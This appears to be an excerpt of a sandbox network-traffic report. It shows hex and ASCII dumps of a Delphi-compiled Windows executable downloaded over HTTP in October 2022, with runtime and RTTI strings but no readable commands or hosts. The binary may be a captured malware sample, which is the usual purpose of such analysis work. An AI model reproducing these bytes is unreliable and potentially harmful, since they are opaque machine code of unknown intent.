                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC247INData Raw: 00 48 74 04 33 db eb 23 8b 45 f0 50 8b 15 4c 2d 43 00 58 e8 7f a6 fc ff 50 8b 45 fc e8 d2 9e fc ff 8b d3 59 e8 3e ed ff ff b3 01 33 c0 5a 59 59 64 89 10 68 51 e6 43 00 8d 45 f4 e8 2f 94 fc ff 8d 45 f8 e8 03 94 fc ff 8d 45 fc e8 d7 93 fc ff c3 e9 ed 89 fc ff eb e0 8b c3 5e 5b 8b e5 5d c3 8d 40 00 55 8b ec 51 53 56 57 89 4d fc 8b fa 8b d8 8b 45 fc 8b 15 4c 2d 43 00 e8 3c a5 fc ff 8b c3 e8 85 e7 ff ff 8b f0 8b c7 e8 90 8a 02 00 8b 00 8b 16 92 e8 5e 79 fc ff 8b d8 84 db 74 19 8b 15 4c 2d 43 00 8b 45 fc e8 ea a5 fc ff 8b c8 8b d7 8b c6 e8 63 ed ff ff 8b c3 5f 5e 5b 59 5d c3 8d 40 00 55 8b ec 51 53 56 57 8b f9 8b f2 8b d8 8b c7 8b 15 4c 2d 43 00 e8 de a4 fc ff 8d 55 fc 8b c3 e8 20 ee ff ff 8b c6 e8 31 8a 02 00 8b 00 8b 00 e8 28 8a 02 00 8b 18 83 7d fc 00 74 12
                                                                                                                                                                                                                                    Data Ascii: Ht3#EPL-CXPEY>3ZYYdhQCE/EE^[]@UQSVWMEL-C<^ytL-CEc_^[Y]@UQSVWL-CU 1(}t
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC263INData Raw: 46 00 08 00 00 00 02 05 56 61 6c 75 65 02 00 02 00 00 00 10 26 44 00 11 3e 54 44 69 63 74 69 6f 6e 61 72 79 3c 53 79 73 74 65 6d 2e 73 74 72 69 6e 67 2c 53 79 73 74 65 6d 2e 54 79 70 49 6e 66 6f 2e 50 54 79 70 65 49 6e 66 6f 3e 2e 54 49 74 65 6d 41 72 72 61 79 0c 00 00 00 80 25 44 00 ff ff ff ff 80 25 44 00 1b 53 79 73 74 65 6d 2e 47 65 6e 65 72 69 63 73 2e 43 6f 6c 6c 65 63 74 69 6f 6e 73 80 25 44 00 02 00 00 00 dc 26 44 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 27 44 00 e4 26 44 00 15 27 44 00 00 00 00 00 2b 27 44 00 10 00 00 00 04 10 44 00 b0 5d 40 00 b8 5d 40 00 14 60 40 00 0c 60 40 00 2c 60 40 00 30 60 40 00 34 60 40 00 28 60 40 00 88 5c 40 00 a4 5c 40 00 d8 5c 40 00 10 78 45 00 24 78 45 00 00 00 00 00 00 00 02 00 00 50 37 44 00 04 00 00 00 0b 46 44
                                                                                                                                                                                                                                    Data Ascii: FValue&D>TDictionary<System.string,System.TypInfo.PTypeInfo>.TItemArray%D%DSystem.Generics.Collections%D&D'D&D'D+'DD]@]@`@`@,`@0`@4`@(`@\@\@\@xE$xEP7DFD
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC279INData Raw: f8 e8 95 4e fc ff 89 73 14 8b c7 8b d3 85 d2 74 03 83 ea e8 e8 82 4e fc ff 33 c0 5a 59 59 64 89 10 68 2f 66 44 00 8d 45 f8 e8 55 4e fc ff c3 e9 0f 0a fc ff eb f0 5f 5e 5b 59 59 5d c3 8b c0 53 56 8b f2 8b 18 0f b7 13 01 10 83 fa 02 75 0a 8b c6 e8 2d 4e fc ff 5e 5b c3 8b d6 8b c3 e8 65 ff ff ff 5e 5b c3 8b c0 e8 fb df ff ff c3 8b c0 53 8b d8 8b c3 e8 0a 4e fc ff 5b c3 53 8b da e8 e4 df ff ff 8b d3 a1 e0 17 4c 00 e8 4c dc ff ff 5b c3 8b c0 53 56 51 e8 c4 fc fb ff 8b da 8b f0 8b 46 18 e8 48 f6 fb ff 8d 46 1c 89 04 24 8b 04 24 8b 00 8b 14 24 33 c9 89 0a e8 31 f6 fb ff b2 fc 22 d3 8b c6 e8 5e 01 00 00 84 db 7e 07 8b c6 e8 33 fc fb ff 5a 5e 5b c3 8d 40 00 8b 40 04 c3 53 8b d9 8b c3 e8 3e 13 fc ff 5b c3 55 8b ec 83 c4 f4 53 56 57 89 4d f8 8b f2 89 45 fc 8b 5d 08
                                                                                                                                                                                                                                    Data Ascii: NstN3ZYYdh/fDEUN_^[YY]SVu-N^[e^[SN[SLL[SVQFHF$$$31"^~3Z^[@@S>[USVWME]
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC295INData Raw: f8 53 56 33 db 89 5d f8 84 d2 74 08 83 c4 f0 e8 a3 bc fb ff 88 55 ff 8b d8 8b 75 08 33 c0 55 68 98 a6 44 00 64 ff 30 64 89 20 8b 45 0c 50 56 33 d2 8b c3 e8 93 fc ff ff 8b c3 e8 4c cd ff ff 83 c0 0d 89 06 8b c3 e8 5c ff ff ff 84 c0 74 1c 8b c3 8b 10 ff 52 54 50 8b c3 8b 10 ff 52 58 5a 2b d0 42 8b 06 e8 1e ff ff ff 89 06 8b 06 e8 d5 54 ff ff 89 06 8d 55 f8 8b c6 e8 c1 bf ff ff 8b 55 f8 8d 43 14 e8 12 0e fc ff 33 c0 5a 59 59 64 89 10 68 9f a6 44 00 8d 45 f8 e8 e5 0d fc ff c3 e9 9f c9 fb ff eb f0 8b c3 80 7d ff 00 74 0f e8 5c bc fb ff 64 8f 05 00 00 00 00 83 c4 0c 8b c3 5e 5b 59 59 5d c2 08 00 53 8b d8 8b c3 e8 ba cc ff ff 8b 50 09 a1 e0 17 4c 00 e8 39 9c ff ff 5b c3 8d 40 00 53 56 8b d8 8b c3 e8 9d cc ff ff 8b 70 05 8b c3 e8 93 cc ff ff 83 78 01 00 7d 05 be
                                                                                                                                                                                                                                    Data Ascii: SV3]tUu3UhDd0d EPV3L\tRTPRXZ+BTUUC3ZYYdhDE}t\d^[YY]SPL9[@SVpx}
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC311INData Raw: b3 7c fb ff 89 4d f8 88 55 ff 8b f8 8b 5d 08 8b 45 0c 50 53 8b 4d f8 33 d2 8b c7 e8 af 81 ff ff 8b c7 e8 64 00 00 00 84 c0 75 0d 8b c7 e8 ed 01 00 00 89 03 ff 03 eb 30 8b c7 e8 e0 01 00 00 83 c0 06 89 03 ff 03 8b c7 e8 d2 01 00 00 0f b6 70 06 85 f6 7e 13 8b 03 e8 2b 89 01 00 89 03 8b 03 0f b7 00 01 03 4e 75 ed 8b c7 80 7d ff 00 74 0f e8 9a 7c fb ff 64 8f 05 00 00 00 00 83 c4 0c 8b c7 5f 5e 5b 59 59 5d c2 08 00 90 53 8b d8 8b c3 e8 8a 01 00 00 80 38 ff 0f 95 c0 5b c3 8b c0 55 8b ec 33 c9 51 51 51 51 51 53 56 8b da 89 45 f8 33 c0 55 68 c0 e7 44 00 64 ff 30 64 89 20 8b 45 f8 e8 c5 ff ff ff 84 c0 75 0c 8b c3 e8 56 93 fb ff e9 c8 00 00 00 8b c3 e8 4a 93 fb ff 8d 55 fc 8b 45 f8 e8 63 01 00 00 8b 75 fc 8b c6 85 c0 74 05 83 e8 04 8b 00 85 c0 7e 69 8b c3 ba dc e7
                                                                                                                                                                                                                                    Data Ascii: |MU]EPSM3du0p~+Nu}t|d_^[YY]S8[U3QQQQQSVE3UhDd0d EuVJUEcut~i
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC327INData Raw: 8b d0 03 d7 58 e8 fd ae fe ff 33 c0 5a 59 59 64 89 10 68 26 26 45 00 8d 45 e8 8b 15 4c 2d 43 00 e8 72 66 fb ff c3 e9 18 4a fb ff eb ea 5f 5e 5b 8b e5 5d c3 8d 40 00 55 8b ec 33 c9 51 51 51 51 51 53 56 57 8b fa 8b d8 33 c0 55 68 f5 26 45 00 64 ff 30 64 89 20 8b c3 8b 10 ff 52 10 8b f0 85 f6 75 37 8d 55 fc 8b c3 8b 08 ff 51 08 ff 75 fc 68 10 27 45 00 8b c3 8b 10 ff 52 14 8d 4d f8 ba 02 00 00 00 e8 ce 7a fc ff ff 75 f8 8b c7 ba 03 00 00 00 e8 33 61 fb ff eb 47 8d 55 f4 8b c3 8b 08 ff 51 08 ff 75 f4 68 24 27 45 00 8d 55 f0 8b c6 8b 08 ff 51 08 ff 75 f0 68 10 27 45 00 8b c3 8b 10 ff 52 14 8d 4d ec ba 02 00 00 00 e8 85 7a fc ff ff 75 ec 8b c7 ba 05 00 00 00 e8 ea 60 fb ff 33 c0 5a 59 59 64 89 10 68 fc 26 45 00 8d 45 ec ba 05 00 00 00 e8 8c 53 fb ff c3 e9 42 49
                                                                                                                                                                                                                                    Data Ascii: X3ZYYdh&&EEL-CrfJ_^[]@U3QQQQQSVW3Uh&Ed0d Ru7UQuh'ERMzu3aGUQuh$'EUQuh'ERMzu`3ZYYdh&EESBI
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC343INData Raw: 8b c6 84 db 74 0f e8 04 fd fa ff 64 8f 05 00 00 00 00 83 c4 0c 8b c6 5e 5b c3 90 55 8b ec 6a 00 53 56 57 84 d2 74 08 83 c4 f0 e8 88 fc fa ff 8b f1 8b da 8b f8 33 c0 55 68 91 66 45 00 64 ff 30 64 89 20 33 d2 8b c7 e8 73 f6 fa ff 85 f6 7d 05 e8 7a a8 fd ff 8d 47 0c 8b 55 08 e8 3b 4e fb ff 83 7f 0c 00 75 13 8d 45 fc e8 15 43 00 00 8b 55 fc 8d 47 0c e8 22 4e fb ff 8b d6 8b c7 e8 61 fc ff ff 33 c0 5a 59 59 64 89 10 68 98 66 45 00 8d 45 fc e8 ec 4d fb ff c3 e9 a6 09 fb ff eb f0 8b c7 84 db 74 0f e8 65 fc fa ff 64 8f 05 00 00 00 00 83 c4 0c 8b c7 5f 5e 5b 59 5d c2 04 00 90 53 56 e8 99 fc fa ff 8b da 8b f0 8b c6 e8 8e 00 00 00 8b 46 28 e8 16 f6 fa ff 8b 46 2c e8 0e f6 fa ff b2 fc 22 d3 8b c6 e8 db fa ff ff 84 db 7e 07 8b c6 e8 10 fc fa ff 5e 5b c3 90 53 56 57 51
                                                                                                                                                                                                                                    Data Ascii: td^[UjSVWt3UhfEd0d 3s}zGU;NuECUG"Na3ZYYdhfEEMted_^[Y]SVF(F,"~^[SVWQ
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC359INData Raw: d8 8b c6 8b 53 04 8b 0d 60 f1 45 00 e8 5e f7 fa ff 5e 5b c3 8d 40 00 8b 40 04 85 c0 74 05 83 e8 04 8b 00 c3 8d 40 00 53 56 8b f2 8b d8 3b 73 08 7d 0a 8d 43 04 8b d6 e8 2f 7c fd ff 8b d6 8d 43 04 e8 89 7b fd ff 5e 5b c3 8b c0 83 c0 04 e8 18 7c fd ff c3 8d 40 00 53 8b 18 ff 53 08 5b c3 83 c4 f8 66 83 78 22 00 0f 95 c2 84 d2 75 17 89 44 24 04 8b 10 8b 52 08 89 14 24 ba 38 a7 45 00 3b 14 24 0f 95 c2 84 d2 74 0b ba 50 a6 45 00 89 50 14 59 5a c3 33 d2 89 50 14 59 5a c3 8d 40 00 55 8b ec 8b 55 08 89 50 20 8b 55 0c 89 50 24 e8 ac ff ff ff 5d c2 08 00 53 8b 40 1c 8b 18 ff 53 0c 5b c3 90 55 8b ec 6a 00 53 56 8b f2 8b d8 33 c0 55 68 1b a7 45 00 64 ff 30 64 89 20 8d 43 1c 8b d6 e8 b5 0d fb ff 83 7b 1c 00 75 18 8d 55 fc a1 a4 4f 46 00 e8 aa 12 00 00 8b 55 fc 8d 43 1c
                                                                                                                                                                                                                                    Data Ascii: S`E^^[@@t@SV;s}C/|C{^[|@SS[fx"uD$R$8E;$tPEPYZ3PYZ@UUP UP$]S@S[UjSV3UhEd0d C{uUOFUC
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC375INData Raw: 01 00 89 ef 45 00 42 00 f4 ff b6 ef 45 00 02 00 f4 ff ec ef 45 00 02 00 f4 ff 04 00 1e 54 4c 69 73 74 3c 53 79 73 74 65 6d 2e 52 74 74 69 2e 54 52 74 74 69 4f 62 6a 65 63 74 3e 26 00 28 9e 45 00 06 43 72 65 61 74 65 03 00 00 00 00 00 08 00 01 08 34 f0 45 00 00 00 04 53 65 6c 66 02 00 02 00 39 00 60 9e 45 00 06 43 72 65 61 74 65 03 00 00 00 00 00 08 00 02 08 34 f0 45 00 00 00 04 53 65 6c 66 02 00 0a 28 e1 45 00 02 00 09 41 43 6f 6d 70 61 72 65 72 02 00 02 00 3a 00 18 7c 4b 00 06 43 72 65 61 74 65 03 00 00 00 00 00 08 00 02 08 34 f0 45 00 00 00 04 53 65 6c 66 02 00 0a b0 a7 43 00 02 00 0a 43 6f 6c 6c 65 63 74 69 6f 6e 02 00 02 00 27 00 b4 9e 45 00 07 44 65 73 74 72 6f 79 03 00 00 00 00 00 08 00 01 08 34 f0 45 00 00 00 04 53 65 6c 66 02 00 02 00 40 00 f4 9e
                                                                                                                                                                                                                                    Data Ascii: EBEETList<System.Rtti.TRttiObject>&(ECreate4ESelf9`ECreate4ESelf(EAComparer:|KCreate4ESelfCCollection'EDestroy4ESelf@
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC391INData Raw: 6e 73 d4 20 44 00 02 00 00 00 00 08 26 46 00 0f 54 49 43 6f 6d 70 61 72 65 72 3c 53 79 73 74 65 6d 2e 47 65 6e 65 72 69 63 73 2e 43 6f 6c 6c 65 63 74 69 6f 6e 73 2e 54 50 61 69 72 3c 53 79 73 74 65 6d 2e 73 74 72 69 6e 67 2c 53 79 73 74 65 6d 2e 54 79 70 49 6e 66 6f 2e 50 54 79 70 65 49 6e 66 6f 3e 3e b0 26 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 53 79 73 74 65 6d 2e 47 65 6e 65 72 69 63 73 2e 44 65 66 61 75 6c 74 73 01 00 ff ff 02 00 00 00 98 26 46 00 08 61 54 43 6f 6c 6c 65 63 74 69 6f 6e 4e 6f 74 69 66 79 45 76 65 6e 74 3c 53 79 73 74 65 6d 2e 47 65 6e 65 72 69 63 73 2e 43 6f 6c 6c 65 63 74 69 6f 6e 73 2e 54 50 61 69 72 3c 53 79 73 74 65 6d 2e 73 74 72 69 6e 67 2c 53 79 73 74 65 6d 2e 54 79 70 49 6e 66 6f 2e 50 54 79 70 65 49 6e 66
                                                                                                                                                                                                                                    Data Ascii: ns D&FTIComparer<System.Generics.Collections.TPair<System.string,System.TypInfo.PTypeInfo>>&@System.Generics.Defaults&FaTCollectionNotifyEvent<System.Generics.Collections.TPair<System.string,System.TypInfo.PTypeInf
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC407INData Raw: 02 00 08 a8 6f 46 00 07 4e 61 6d 65 46 6c 64 00 00 a8 5c 46 00 00 02 00 08 b4 6f 46 00 04 54 61 69 6c 00 00 50 5e 46 00 00 02 00 28 66 46 00 0e 14 54 49 6e 74 66 4d 65 74 68 6f 64 45 6e 74 72 79 54 61 69 6c 03 00 00 00 00 00 00 00 00 03 00 00 00 b4 10 40 00 00 00 00 00 02 04 4b 69 6e 64 02 00 bc 5d 46 00 01 00 00 00 02 02 43 43 02 00 b4 10 40 00 02 00 00 00 02 0a 50 61 72 61 6d 43 6f 75 6e 74 02 00 02 00 00 00 00 88 66 46 00 0e 0e 54 41 72 72 61 79 54 79 70 65 44 61 74 61 0d 04 00 00 00 00 00 00 00 05 00 00 00 9c 10 40 00 00 00 00 00 02 04 53 69 7a 65 02 00 9c 10 40 00 04 00 00 00 02 07 45 6c 43 6f 75 6e 74 02 00 a0 5e 46 00 08 00 00 00 02 06 45 6c 54 79 70 65 02 00 b4 10 40 00 0c 00 00 00 02 08 44 69 6d 43 6f 75 6e 74 02 00 00 00 00 00 0d 00 00 00 02 04
                                                                                                                                                                                                                                    Data Ascii: oFNameFld\FoFTailP^F(fFTIntfMethodEntryTail@Kind]FCC@ParamCountfFTArrayTypeData@Size@ElCount^FElType@DimCount
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC423INData Raw: 20 49 45 71 75 61 6c 69 74 79 43 6f 6d 70 61 72 65 72 3c 53 79 73 74 65 6d 2e 73 74 72 69 6e 67 3e b0 26 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 53 79 73 74 65 6d 2e 47 65 6e 65 72 69 63 73 2e 44 65 66 61 75 6c 74 73 02 00 ff ff 02 00 00 00 54 a6 46 00 0f 18 49 43 6f 6d 70 61 72 65 72 3c 53 79 73 74 65 6d 2e 73 74 72 69 6e 67 3e b0 26 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 53 79 73 74 65 6d 2e 47 65 6e 65 72 69 63 73 2e 44 65 66 61 75 6c 74 73 01 00 ff ff 02 00 00 00 cc 83 c0 f8 50 8b 00 8b 40 04 87 04 24 c3 83 c0 f8 50 8b 00 8b 40 08 87 04 24 c3 83 44 24 04 f8 e9 13 15 00 00 83 44 24 04 f8 e9 31 15 00 00 83 44 24 04 f8 e9 33 15 00 00 83 c0 f4 50 8b 00 8b 00 87 04 24 c3 83 44 24 04 f4 e9 e9 14 00 00 83 44 24 04 f4
                                                                                                                                                                                                                                    Data Ascii: IEqualityComparer<System.string>&@System.Generics.DefaultsTFIComparer<System.string>&@System.Generics.DefaultsP@$P@$D$D$1D$3P$D$D$
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC439INData Raw: 02 47 00 42 00 f4 ff 9f 02 47 00 42 00 f4 ff dd 02 47 00 42 00 f4 ff 2a 03 47 00 42 00 f4 ff 74 03 47 00 42 00 f4 ff be 03 47 00 42 00 f4 ff 18 04 47 00 42 00 f4 ff 66 04 47 00 42 00 f4 ff ad 04 47 00 42 00 f4 ff ec 04 47 00 42 00 f4 ff 2e 05 47 00 42 00 f4 ff 6e 05 47 00 42 00 f4 ff c2 05 47 00 42 00 f4 ff 15 06 47 00 42 00 f4 ff 7c 06 47 00 42 00 f4 ff d3 06 47 00 42 00 f4 ff 19 07 47 00 42 00 f4 ff 0b 00 07 54 53 74 72 65 61 6d 43 00 a8 d6 48 00 04 52 65 61 64 03 00 9c 10 40 00 08 00 03 08 48 07 47 00 00 00 04 53 65 6c 66 02 00 01 00 00 00 00 01 00 06 42 75 66 66 65 72 02 00 00 9c 10 40 00 02 00 05 43 6f 75 6e 74 02 00 02 00 44 00 ac d6 48 00 05 57 72 69 74 65 03 00 9c 10 40 00 08 00 03 08 48 07 47 00 00 00 04 53 65 6c 66 02 00 02 00 00 00 00 01 00 06
                                                                                                                                                                                                                                    Data Ascii: GBGBGB*GBtGBGBGBfGBGBGB.GBnGBGBGB|GBGBGBTStreamCHRead@HGSelfBuffer@CountDHWrite@HGSelf
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC455INData Raw: 05 43 6f 75 6e 74 02 00 02 00 46 00 18 7c 4b 00 07 52 65 61 64 56 61 72 03 00 00 00 00 00 08 00 03 08 8c 2c 47 00 00 00 04 53 65 6c 66 02 00 01 34 11 40 00 01 00 06 42 75 66 66 65 72 02 00 00 54 11 40 00 02 00 05 43 6f 75 6e 74 02 00 02 00 46 00 18 7c 4b 00 07 52 65 61 64 56 61 72 03 00 00 00 00 00 08 00 03 08 8c 2c 47 00 00 00 04 53 65 6c 66 02 00 01 8c 11 40 00 01 00 06 42 75 66 66 65 72 02 00 00 54 11 40 00 02 00 05 43 6f 75 6e 74 02 00 02 00 46 00 18 7c 4b 00 07 52 65 61 64 56 61 72 03 00 00 00 00 00 08 00 03 08 8c 2c 47 00 00 00 04 53 65 6c 66 02 00 01 b0 11 40 00 01 00 06 42 75 66 66 65 72 02 00 00 54 11 40 00 02 00 05 43 6f 75 6e 74 02 00 02 00 46 00 18 7c 4b 00 07 52 65 61 64 56 61 72 03 00 00 00 00 00 08 00 03 08 8c 2c 47 00 00 00 04 53 65 6c 66
                                                                                                                                                                                                                                    Data Ascii: CountF|KReadVar,GSelf4@BufferT@CountF|KReadVar,GSelf@BufferT@CountF|KReadVar,GSelf@BufferT@CountF|KReadVar,GSelf
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC471INData Raw: 40 00 01 00 06 41 49 6e 64 65 78 02 00 02 00 0c 66 47 00 07 0a 54 43 6f 6d 70 6f 6e 65 6e 74 60 5b 47 00 f8 d7 46 00 02 00 0e 53 79 73 74 65 6d 2e 43 6c 61 73 73 65 73 02 00 f4 51 47 00 08 00 00 ff 28 00 00 fe 00 00 00 00 00 00 00 80 00 00 00 00 00 00 04 4e 61 6d 65 54 11 40 00 0c 00 00 ff 0c 00 00 ff 01 00 00 00 00 00 00 80 00 00 00 00 01 00 03 54 61 67 0b 00 02 d5 66 47 00 02 00 02 f9 66 47 00 02 00 02 22 67 47 00 02 00 02 4b 67 47 00 02 00 02 74 67 47 00 02 00 02 9d 67 47 00 02 00 02 c2 67 47 00 02 00 02 e2 67 47 00 02 00 02 09 68 47 00 02 00 03 33 66 47 00 02 00 03 52 66 47 00 02 00 02 00 01 00 04 1d 00 ff ff 0a 43 6f 6d 70 6f 6e 65 6e 74 73 02 00 b0 26 40 00 5c 8f 49 00 00 00 00 00 01 00 00 00 00 00 00 80 00 00 00 80 ff ff 09 43 6f 6d 4f 62 6a 65 63
                                                                                                                                                                                                                                    Data Ascii: @AIndexfGTComponent`[GFSystem.ClassesQG(NameT@TagfGfG"gGKgGtgGgGgGgGhG3fGRfGComponents&@\IComObjec
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC487INData Raw: 00 02 00 4e 00 18 7c 4b 00 0b 49 6e 73 65 72 74 52 61 6e 67 65 03 00 00 00 00 00 08 00 03 08 f0 ac 47 00 00 00 04 53 65 6c 66 02 00 00 9c 10 40 00 01 00 05 49 6e 64 65 78 02 00 0a 70 9e 47 00 02 00 0a 43 6f 6c 6c 65 63 74 69 6f 6e 02 00 02 00 4e 00 18 7c 4b 00 0b 49 6e 73 65 72 74 52 61 6e 67 65 03 00 00 00 00 00 08 00 03 08 f0 ac 47 00 00 00 04 53 65 6c 66 02 00 00 9c 10 40 00 01 00 05 49 6e 64 65 78 02 00 0a c4 9c 47 00 02 00 0a 43 6f 6c 6c 65 63 74 69 6f 6e 02 00 02 00 24 00 18 7c 4b 00 04 50 61 63 6b 03 00 00 00 00 00 08 00 01 08 f0 ac 47 00 00 00 04 53 65 6c 66 02 00 02 00 35 00 18 7c 4b 00 04 50 61 63 6b 03 00 00 00 00 00 08 00 02 08 f0 ac 47 00 00 00 04 53 65 6c 66 02 00 0a b4 9e 47 00 01 00 07 49 73 45 6d 70 74 79 02 00 02 00 35 00 18 7c 4b 00 06
                                                                                                                                                                                                                                    Data Ascii: N|KInsertRangeGSelf@IndexpGCollectionN|KInsertRangeGSelf@IndexGCollection$|KPackGSelf5|KPackGSelfGIsEmpty5|K
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC503INData Raw: ff ff ff ff d8 69 47 00 1b 53 79 73 74 65 6d 2e 47 65 6e 65 72 69 63 73 2e 43 6f 6c 6c 65 63 74 69 6f 6e 73 d8 69 47 00 02 00 00 28 e6 47 00 0f 2a 49 43 6f 6d 70 61 72 65 72 3c 53 79 73 74 65 6d 2e 43 6c 61 73 73 65 73 2e 54 42 61 73 69 63 41 63 74 69 6f 6e 4c 69 6e 6b 3e b0 26 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 53 79 73 74 65 6d 2e 47 65 6e 65 72 69 63 73 2e 44 65 66 61 75 6c 74 73 01 00 ff ff 02 00 8c e6 47 00 08 37 54 43 6f 6c 6c 65 63 74 69 6f 6e 4e 6f 74 69 66 79 45 76 65 6e 74 3c 53 79 73 74 65 6d 2e 43 6c 61 73 73 65 73 2e 54 42 61 73 69 63 41 63 74 69 6f 6e 4c 69 6e 6b 3e 00 03 08 06 53 65 6e 64 65 72 07 54 4f 62 6a 65 63 74 0a 04 49 74 65 6d 10 54 42 61 73 69 63 41 63 74 69 6f 6e 4c 69 6e 6b 00 06 41 63 74 69 6f 6e 17 54
                                                                                                                                                                                                                                    Data Ascii: iGSystem.Generics.CollectionsiG(G*IComparer<System.Classes.TBasicActionLink>&@System.Generics.DefaultsG7TCollectionNotifyEvent<System.Classes.TBasicActionLink>SenderTObjectItemTBasicActionLinkActionT
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC519INData Raw: 03 08 20 2d 48 00 00 00 04 53 65 6c 66 02 00 00 9c 10 40 00 01 00 05 49 6e 64 65 78 02 00 16 2c d8 46 00 02 00 06 56 61 6c 75 65 73 02 00 02 00 4e 00 18 7c 4b 00 0b 49 6e 73 65 72 74 52 61 6e 67 65 03 00 00 00 00 00 08 00 03 08 20 2d 48 00 00 00 04 53 65 6c 66 02 00 00 9c 10 40 00 01 00 05 49 6e 64 65 78 02 00 0a 48 1e 48 00 02 00 0a 43 6f 6c 6c 65 63 74 69 6f 6e 02 00 02 00 4e 00 18 7c 4b 00 0b 49 6e 73 65 72 74 52 61 6e 67 65 03 00 00 00 00 00 08 00 03 08 20 2d 48 00 00 00 04 53 65 6c 66 02 00 00 9c 10 40 00 01 00 05 49 6e 64 65 78 02 00 0a b8 0e 48 00 02 00 0a 43 6f 6c 6c 65 63 74 69 6f 6e 02 00 02 00 24 00 d4 d7 49 00 04 50 61 63 6b 03 00 00 00 00 00 08 00 01 08 20 2d 48 00 00 00 04 53 65 6c 66 02 00 02 00 35 00 18 7c 4b 00 04 50 61 63 6b 03 00 00 00
                                                                                                                                                                                                                                    Data Ascii: -HSelf@Index,FValuesN|KInsertRange -HSelf@IndexHHCollectionN|KInsertRange -HSelf@IndexHCollection$IPack -HSelf5|KPack
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC535INData Raw: 1c 4c 00 8b 40 08 3b c3 77 05 e8 c0 a8 fa ff a1 24 1c 4c 00 8b 40 04 8b 3c 98 8b c6 ff d7 85 c0 75 06 4b 83 fb ff 75 d6 5f 5e 5b c3 00 00 00 80 66 48 00 00 00 00 00 00 00 00 00 00 00 00 00 2c 67 48 00 80 66 48 00 ad 66 48 00 00 00 00 00 c3 66 48 00 10 00 00 00 10 17 40 00 b0 5d 40 00 b8 5d 40 00 14 60 40 00 0c 60 40 00 2c 60 40 00 30 60 40 00 34 60 40 00 28 60 40 00 88 5c 40 00 a4 5c 40 00 38 a7 48 00 00 00 00 00 00 00 02 00 00 70 11 40 00 04 00 00 00 05 46 48 69 74 73 02 00 00 74 82 48 00 08 00 00 00 08 46 4f 66 66 73 65 74 73 02 00 00 00 02 00 d8 66 48 00 44 00 f4 ff fe 66 48 00 4d 00 ff ff 00 00 14 54 46 69 65 6c 64 73 43 61 63 68 65 2e 54 46 69 65 6c 64 73 26 00 e4 a6 48 00 06 43 72 65 61 74 65 03 00 00 00 00 00 08 00 01 08 28 67 48 00 00 00 04 53 65
                                                                                                                                                                                                                                    Data Ascii: L@;w$L@<uKu_^[fH,gHfHfHfH@]@]@`@`@,`@0`@4`@(`@\@\@8Hp@FHitstHFOffsetsfHDfHMTFieldsCache.TFields&HCreate(gHSe
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC551INData Raw: 89 48 00 08 00 09 41 43 6f 6d 70 61 72 65 72 02 00 02 00 60 00 e0 fd 49 00 06 43 72 65 61 74 65 03 00 00 00 00 00 10 00 04 08 6c a6 48 00 00 00 04 53 65 6c 66 02 00 00 a4 0e 43 00 02 00 0a 4f 77 6e 65 72 73 68 69 70 73 02 00 00 9c 10 40 00 0c 00 09 41 43 61 70 61 63 69 74 79 02 00 0a d8 89 48 00 08 00 09 41 43 6f 6d 70 61 72 65 72 02 00 02 00 70 a6 48 00 07 44 54 4f 62 6a 65 63 74 44 69 63 74 69 6f 6e 61 72 79 3c 53 79 73 74 65 6d 2e 54 43 6c 61 73 73 2c 53 79 73 74 65 6d 2e 43 6c 61 73 73 65 73 2e 54 46 69 65 6c 64 73 43 61 63 68 65 2e 54 46 69 65 6c 64 73 3e e0 a4 48 00 0c a3 48 00 00 00 1b 53 79 73 74 65 6d 2e 47 65 6e 65 72 69 63 73 2e 43 6f 6c 6c 65 63 74 69 6f 6e 73 00 00 00 00 02 00 00 00 53 56 84 d2 74 08 83 c4 f0 e8 be bb f7 ff 8b da 8b f0 33 d2
                                                                                                                                                                                                                                    Data Ascii: HAComparer`ICreatelHSelfCOwnerships@ACapacityHAComparerpHDTObjectDictionary<System.TClass,System.Classes.TFieldsCache.TFields>HHSystem.Generics.CollectionsSVt3
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC567INData Raw: 06 53 79 73 74 65 6d 01 00 ff ff 02 00 00 00 0c e6 48 00 0f 2b 54 4c 69 73 74 3c 53 79 73 74 65 6d 2e 43 6c 61 73 73 65 73 2e 54 50 72 6f 70 46 69 78 75 70 3e 2e 54 45 6d 70 74 79 46 75 6e 63 b0 26 40 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 53 79 73 74 65 6d 2e 47 65 6e 65 72 69 63 73 2e 43 6f 6c 6c 65 63 74 69 6f 6e 73 01 00 ff ff 02 00 c8 e6 48 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 e7 48 00 d0 e6 48 00 fb e6 48 00 00 00 00 00 11 e7 48 00 10 00 00 00 6c e1 48 00 b0 5d 40 00 b8 5d 40 00 14 60 40 00 0c 60 40 00 2c 60 40 00 30 60 40 00 34 60 40 00 28 60 40 00 88 5c 40 00 a4 5c 40 00 d8 5c 40 00 48 07 4a 00 58 07 4a 00 00 00 00 00 00 00 02 00 00 70 f4 48 00 04 00 00 00 05 46 4c 69 73 74 02 00 00 9c 10 40 00 08 00 00 00 06 46 49 6e 64 65
